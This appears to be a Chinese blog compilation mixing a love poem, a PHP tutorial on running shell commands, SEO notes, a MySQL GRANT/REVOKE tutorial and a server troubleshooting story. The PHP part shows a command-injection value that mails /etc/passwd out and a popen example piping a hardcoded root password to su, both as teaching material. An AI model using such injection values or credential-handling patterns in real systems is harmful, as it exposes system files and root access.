清水的百宝箱

HTML特殊符号对照表：转自疯狂的柠檬

世人都说，
喜欢是浅浅的爱，
爱是深深的喜欢，
殊不知，
这深和浅之间究竟有多少不同？

在喜欢的人眼前，
你会尽量做到举止优雅，
侃侃而谈，
外加风流倜傥，
小胜潘安；
而在你爱的人眼前，
你动作呆板，
眼神无光，
自信不满，
自然会因为担心表现不好而心慌意乱。

为喜欢的人失眠，
你会半夜打电话给TA，
诉说你的思念，
言语蜜蜜甜甜。
而为爱的人失眠，
想好了一堆的台词，
一遍一遍按着TA的电话号码，
却始终没有勇气按下那拔号键。

喜欢的人有了爱人，
生气的横眉瞪眼，
伤心的为爱失眠，
乐观的就当作是过眼云烟，
悲观的甚至自寻短见；
你所爱的人跟了别人，
你也许会愤怒，
也行会悲伤，
也许会痛苦，
但更多的是反省。
人世间最难得的是感情，
最不容易保存的也是感情。

爱情变质了，
如果不是面包的原因，
那就得从自己身上找原因了。
感情的破裂并不是一个人的事情，
而是两到三个人的事情。

                                                                                              --无风的飘逸
                                                                                          书于己丑年伯秋

　　我们知道php给我们提供了system()，exec()，passthru()这三个函数来调用外部的命令.
　　虽然这三个命令都能执行linux系统的shell命令，但是其实他们是有区别的：
　　　　system() 输出并返回最后一行shell结果。
　　　　exec() 不输出结果，返回最后一行shell结果，所有结果可以保存到一个返回的数组里面。
　　　　passthru() 只调用命令，把命令的运行结果原样地直接输出到标准输出设备上。
　　相同点：都可以获得命令执行的状态码

在PHP中调用外部命令，可以用如下三种方法来实现：
1） 用PHP提供的专门函数
PHP提供共了3个专门的执行外部命令的函数：system()，exec()，passthru()。

system()
原型：string system (string command [, int return_var])
system()函数很其它语言中的差不多，它执行给定的命令，输出和返回结果。第二个参数是可选的，用来得到命令执行后的状态码。
例子：
system("/usr/local/bin/webalizer/webalizer");

exec()
原型：string exec(string command [, string array [, int return_var]])
exec()函数与system()类似，也执行给定的命令，但不输出结果，而是返回结果的最后一行。虽然它只返回命令结果的最后一行，但用第二个参数array 可以得到完整的结果，方法是把结果逐行追加到array的结尾处。所以如果array不是空的，在调用之前最好用unset()最它清掉。只有指定了第二个参数时，才可以用第三个参数，用来取得命令执行的状态码。
例子：
exec("/bin/ls -l");
exec("/bin/ls -l", $res);
exec("/bin/ls -l", $res, $rc);

passthru()
原型：void passthru (string command [, int return_var])
passthru ()只调用命令，不返回任何结果，但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus （Unix下的一个处理图片的工具，输出二进制的原始图片的流）这样的程序。同样它也可以得到命令执行的状态码。
例子：
header("Content-type: image/gif");
passthru("./ppmtogif hunte.ppm");

2） 用popen()函数打开进程
上面的方法只能简单地执行命令，却不能与命令交互。但有些时候必须向命令输入一些东西，如在增加Linux的系统用户时，要调用su来把当前用户换到root才行，而su命令必须要在命令行上输入root的密码。这种情况下，用上面提到的方法显然是不行的。
popen ()函数打开一个进程管道来执行给定的命令，返回一个文件句柄。既然返回的是一个文件句柄，那么就可以对它读和写了。在PHP3中，对这种句柄只能做单一 的操作模式，要么写，要么读；从PHP4开始，可以同时读和写了。除非这个句柄是以一种模式（读或写）打开的，否则必须调用pclose()函数来关闭 它。
例子1：
$fp=popen("/bin/ls -l", "r");

例子2
/* PHP中如何增加一个系统用户
下面是一段例程，增加一个名字为james的用户,
root密码是 verygood。仅供参考
*/
$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "verygood";
$user = "james";
$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w");
@fputs($fp,$rootpasswd);
@pclose($fp);
?>
3） 用反撇号（`，也就是键盘上ESC键下面的那个，和~在同一个上面）
这个方法以前没有归入PHP的文档，是作为一个秘技存在的。方法很简单，用两个反撇号把要执行的命令括起来作为一个表达式，这个表达式的值就是命令执行的结果。如：
$res='/bin/ls -l';
echo '
'.$res.'
';

这个脚本的输出就象：
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考虑些什么？
要考虑两个问题：安全性和超时。
先 看安全性。比如，你有一家小型的网上商店，所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件，让你的用户输入他们的EMAIL地 址，然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数（或者从未听说过），你就调用Linux/Unix系统的mail程序来发送这 个文件。程序就象这样：
system("mail $to < products.txt");
echo "我们的产品目录已经发送到你的信箱：$to";

用这段代码，一般的用户不会产生什么危险，但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址：
'--bla ; mail someone@domain.com < /etc/passwd ;'
那么这条命令最终变成：
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
我相信，无论哪个网络管理人员见到这样的命令，都会吓出一身冷汗来。
幸 好，PHP为我们提供了两个函数：EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的，象分号（），重定向（>）和从文件读入 （<）等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号，并把字符串中的单引号转义，这样这个字符串就可以安全地作为命令的参数。
再来看看超时问题。如果要执行的命令要花费很长的时间，那么应该把这个命令放到系统的后台去运 行。但在默认情况下，象system()等函数要等到这个命令运行完才返回（实际上是要等命令的输出结果），这肯定会引起PHP脚本的超时。解决的办法是 把命令的输出重定向到另外一个文件或流中，如：
system("/usr/local/bin/order_proc > /tmp/null &");

ＭＯＭＯ，我的网站被百度降权两次，终于在这次大更新的时候把我放出来了，毕竟我的网站也已经有三个月的高龄了。哈哈……

最近都没有时间去管我的博客，但是今天搜索我的主关键字之后发现，我的排名还是没有掉，看来不热门的关键字、不来钱的关键字，还是很少有人会去做的。

今日初研究网站转移法(传说中的乾坤大挪移)，
注意的有以下几点…
1、SSH ;
2、数据库;
3、日志的记录;
4、建站成功后的批量生效;

对于初学SEO的朋友来说打好以下三点基础是最重要的：
一、分析关键词;
二、分析网站流量;
三、分析竞争对手的外链情况。
今天很困，改天祥述

大叔的清洁工作还没做完，我的服器却配完了~
辛苦你了，大叔。
我就先回去等着做白日梦了。

GRANT语在user表中为该用户创建一条记录。如果语句指定任何全局权限（管理权限或适用于所有数据库的权限），这些也记录在user表中。如果你指定数据库、表和列级权限，他们被分别记录在db、tables_priv和columns_priv表中。
用GRANT和REVOKE比直接修改授权表更容易些，然而，建议你阅读一下《MySQL安全性指南》。这些表异常重要，而且作为一名管理员，你应该理解它们如何超越GRANT和REVOKE语句的功能水平。

　　在下面的章节中，我们将介绍如何设置MySQL用户账号并授权。我们也涉及如何撤权和从授权表中删除用户。

　你可能也想考虑使用mysqlaccess和mysql_setpermission脚本，它是MySQL分发的一部分，它们是Perl脚本，提供GRANT语句的另一种选择设置用户账号。mysql_setpermission需要安装DBI支持。

　　1 创建用户并授权

　　GRANT语句的语法看上去像这样
　　
　　GRANT privileges (columns)
　　ON what
　　TO user IDENTIFIED BY "password"
　　WITH GRANT OPTION
　　要使用该语句，你需要填写下列部分：
　　
　　privileges
　　授予用户的权限，下表列出可用于GRANT语句的权限指定符：
ALL意味着“所有权限”，UASGE意味着无权限，即创建用户，但不授予权限。

　　columns
　　权限运用的列，它是可选的，并且你只能设置列特定的权限。如果命令有多于一个列，应该用逗号分开它们。
　　
　　what
　　权限运用的级别。权限可以是全局的（适用于所有数据库和所有表）、特定数据库（适用于一个数据库中的所有表）或特定表的。可以通过指定一个columns字句是权限是列特定的。
　　
　　user
　　权限授予的用户，它由一个用户名和主机名组成。在MySQL中，你不仅指定谁能连接，还有从哪里连接。这允许你让两个同名用户从不同地方连接。MySQL让你区分他们，并彼此独立地赋予权限。
　　
　　MySQL中的一个用户名就是你连接服务器时指定的用户名，该名字不必与你的Unix登录名或Windows名联系起来。缺省地，如果你不明确指定一个名字，客户程序将使用你的登录名作为MySQL用户名。这只是一个约定。你可以在授权表中将该名字改为nobody，然后以nobody连接执行需要超级用户权限的操作。
　　
　　password
　　赋予用户的口令，它是可选的。如果你对新用户没有指定IDENTIFIEDBY子句，该用户不赋给口令（不安全）。对现有用户，任何你指定的口令将代替老口令。如果你不指定口令，老口令保持不变，当你用IDENTIFIEDBY时，口令字符串用改用口令的字面含义，GRANT将为你编码口令，不要象你用SET PASSWORD 那样使用password()函数。
　　
　　WITH GRANT OPTION子句是可选的。如果你包含它，用户可以授予权限通过GRANT语句授权给其它用户。你可以用该子句给与其它用户授权的能力。
　　
　　用户名、口令、数据库和表名在授权表记录中是大小写敏感的，主机名和列名不是。
　　
　　一般地，你可以通过询问几个简单的问题来识别GRANT语句的种类：
　　
　　谁能连接，从那儿连接？
　　用户应该有什么级别的权限，他们适用于什么？
　　用户应该允许管理权限吗？
　　下面就讨论一些例子。
　　

　　1.1 谁能连接，从那儿连接？
　　你可以允许一个用户从特定的或一系列主机连接。有一个极端，如果你知道降职从一个主机连接，你可以将权限局限于单个主机：
　　
　　GRANT ALL ON samp_db.* TO boris@localhost IDENTIFIED BY "ruby"
　　GRANT ALL ON samp_db.* TO fred@res.mars.com IDENTIFIED BY "quartz"
　　(samp_db.*意思是“samp_db数据库的所有表)另一个极端是，你可能有一个经常旅行并需要能从世界各地的主机连接的用户max。在这种情况下，你可以允许他无论从哪里连接：
　　
　　GRANT ALL ON samp_db.* TO max@% IDENTIFIED BY "diamond"
　　“%”字符起通配符作用，与LIKE模式匹配的含义相同。在上述语句中，它意味着“任何主机”。所以max和max@%等价。这是建立用户最简单的方法，但也是最不安全的。
　　
　　取其中，你可以允许一个用户从一个受限的主机集合访问。例如，要允许mary从snake.net域的任何主机连接，用一个%.snake.net主机指定符：
　　
　　GRANT ALL ON samp_db.* TO mary@.snake.net IDENTIFIED BY "quartz";
　　如果你喜欢，用户标识符的主机部分可以用IP地址而不是一个主机名来给定。你可以指定一个IP地址或一个包含模式字符的地址，而且，从MySQL 3.23，你还可以指定具有指出用于网络号的位数的网络掩码的IP号：
　　
　　GRANT ALL ON samp_db.* TO boris@192.168.128.3 IDENTIFIED BY "ruby"
　　GRANT ALL ON samp_db.* TO fred@192.168.128.% IDENTIFIED BY "quartz"
　　GRANT ALL ON samp_db.* TO rex@192.168.128.0/17 IDENTIFIED BY "ruby"
　　第一个例子指出用户能从其连接的特定主机，第二个指定对于C类子网192.168.128的IP模式，而第三条语句中，192.168.128.0/17指定一个17位网络号并匹配具有192.168.128头17位的IP地址

　　如果MySQL抱怨你指定的用户值，你可能需要使用引号（只将用户名和主机名部分分开加引号）。
　　
　　GRANT ALL ON samp_db.president TO "my friend"@"boa.snake.net"

　　1.2 用户应该有什么级别的权限和它们应该适用于什么？
　　你可以授权不同级别的权限，全局权限是最强大的，因为它们适用于任何数据库。要使ethel成为可做任何事情的超级用户，包括能授权给其它用户，发出下列语句：
　　
　　GRANT ALL ON *.* TO ethel@localhost IDENTIFIED BY "coffee" WITH GRANT OPTION
　　ON子句中的*.*意味着“所有数据库、所有表”。从安全考虑，我们指定ethel只能从本地连接。限制一个超级用户可以连接的主机通常是明智的，因为它限制了试图破解口令的主机。
　　有些权限（FILE、PROCESS、RELOAD和SHUTDOWN）是管理权限并且只能用"ON*.*"全局权限指定符授权。如果你愿意，你可以授权这些权限，而不授权数据库权限。例如，下列语句设置一个flush用户，他只能发出flush语句。这可能在你需要执行诸如清空日志等的管理脚本中会有用：
　　
　　GRANT RELOAD ON *.* TO flushl@localhost IDENTIFIED BY "flushpass"
　　一般地，你想授权管理权限，吝啬点，因为拥有它们的用户可以影响你的服务器的操作。
　　
　　数据库级权限适用于一个特定数据库中的所有表，它们可通过使用ON db_name.*子句授予：
　　
　　GRANT ALL ON samp_db TO bill@racer.snake.net INDETIFIED BY "rock"
　　GRANT SELECT ON samp_db TO ro_user@% INDETIFIED BY "rock"
　　第一条语句向bill授权samp_db数据库中所有表的权限，第二条创建一个严格限制访问的用户ro_user（只读用户），只能访问samp_db数据库中的所有表，但只有读取，即用户只能发出SELECT语句。
　　
　　你可以列出一系列同时授予的各个权限。例如，如果你想让用户能读取并能修改现有数据库的内容，但不能创建新表或删除表，如下授予这些权限：
　　
　　GRANT SELECT,INSERT,DELETE,UPDATE ON samp_db TO bill@snake.net INDETIFIED BY "rock"
　　对于更精致的访问控制，你可以在各个表上授权，或甚至在表的每个列上。当你想向用户隐藏一个表的部分时，或你想让一个用户只能修改特定的列时，列特定权限非常有用。如：
　　
　　GRANT SELECT ON samp_db.member TO bill@localhost INDETIFIED BY "rock"
　　GRANT UPDATE (expiration) ON samp_db. member TO bill@localhost
　　第一条语句授予对整个member表的读权限并设置了一个口令，第二条语句增加了UPDATE权限，当只对expiration列。没必要再指定口令，因为第一条语句已经指定了。
　　
　　如果你想对多个列授予权限，指定一个用逗号分开的列表。例如，对assistant用户增加member表的地址字段的UPDATE权限，使用如下语句，新权限将加到用户已有的权限中：
　　
　　GRANT UPDATE (street,city,state,zip) ON samp_db TO assistant@localhost
　　
　　通常，你不想授予任何比用户确实需要的权限宽的权限。然而，当你想让用户能创建一个临时表以保存中间结果，但你又不想让他们在一个包含他们不应修改内容的数据库中这样做时，发生了要授予在一个数据库上的相对宽松的权限。你可以通过建立一个分开的数据库（如tmp）并授予开数据库上的所有权限来进行。例如，如果你想让来自mars.net域中主机的任何用户使用tmp数据库，你可以发出这样的GRANT语句：
　　
　　GRANT ALL ON tmp.* TO ""@mars.net
　　
　　在你做完之后，用户可以创建并用tmp.tbl_name形式引用tmp中的表（在用户指定符中的""创建一个匿名用户，任何用户均匹配空白用户名）。
　　
　　1.3 用户应该被允许管理权限吗？
　　你可以允许一个数据库的拥有者通过授予数据库上的所有拥有者权限来控制数据库的访问，在授权时，指定WITH GRANTOPTION。例如：如果你想让alicia能从big.corp.com域的任何主机连接并具有sales数据库中所有表的管理员权限，你可以用如下GRANT语句：
　　
　　GRANT ALL ON sales.* TO alicia@%.big.corp.com INDETIFIED BY "applejuice" WITH GRANT OPTION
　　
　　在效果上WITH GRANTOPTION子句允许你把访问授权的权利授予另一个用户。要注意，拥有GRANT权限的两个用户可以彼此授权。如果你只给予了第一个用户SELECT权限，而另一个用户有GRANT加上SELECT权限，那么第二个用户可以是第一个用户更“强大”。
　　
　　2 撤权并删除用户

　　要取消一个用户的权限，使用REVOKE语句。REVOKE的语法非常类似于GRANT语句，除了TO用FROM取代并且没有INDETIFED BY和WITH GRANT OPTION子句：
　　
　　REVOKE privileges (columns) ON what FROM user
　　
　　user部分必须匹配原来GRANT语句的你想撤权的用户的user部分。privileges部分不需匹配，你可以用GRANT语句授权，然后用REVOKE语句只撤销部分权限。
　　
　　REVOKE语句只删除权限，而不删除用户。即使你撤销了所有权限，在user表中的用户记录依然保留，这意味着用户仍然可以连接服务器。要完全删除一个用户，你必须用一条DELETE语句明确从user表中删除用户记录：
　　
　　%mysql -u root mysql
　　mysql>DELETE FROM user
　　->WHERE User="user_name" and Host="host_name";
　　mysql>FLUSH PRIVILEGES;
　　DELETE语句删除用户记录，而FLUSH语句告诉服务器重载授权表。（当你使用GRANT和REVOKE语句时，表自动重载，而你直接修改授权表时不是

千辛万苦把建站系统从拥挤的环境换了个新家，但是在拉取域名列表的时候出了问题。
拉取域名的时候我们要用到www.domain.com的一个API，用CURL实现。

在经过两个小时的查看，移过来的代码没有任何错误，而且有用到的用户名和密码也都是正确的，实在看不出来在哪一环节出了问题。

由于程序有用到curl，而且两台服务器都已经成功安装了curl，在这样的情况下，我有理由怀疑新服务器上的curl出了问题，于是乎，小邹我写了一段有关curl的代码，分别在两台服务器上运行了最后发现两台服务器上的curl都运行正常。

万般无奈之下，小邹只好，写了两段建站系统拉取域名列表的curl代码（这对于从来没有用curl编写过代码的小邹来说，确实是一个大挑战），写好代码，传到两台服务器，最后发现新服务器果然出问题了。

同样的代码curl都正常，得到两种结果，让我马上想到网络问题。于是我试了一下wget http://www.domain.com/

两台服务器，一台的速度是24.7K/s 新服务器是30B/s    一个24,一个30,也算正常*(.)(.)（白痴的眼神，那个可是B/s,天啊，有这么慢的网速吗？）敲了一下自己的脑袋之后，我试了一下ping www.domain.com 命令，两台返回的IP是不一样的。原因出来了，那问解决办法也很快就在小邹的脑壳里生产出来了。IP不对，网速不对，把网速快的IP映射过来，嘿嘿

接下来要用到的就是linux下的hosts设置了，将新服务器的www.domain.com 的IP映射到速度快的那个IP上去。

经过测试确实可行。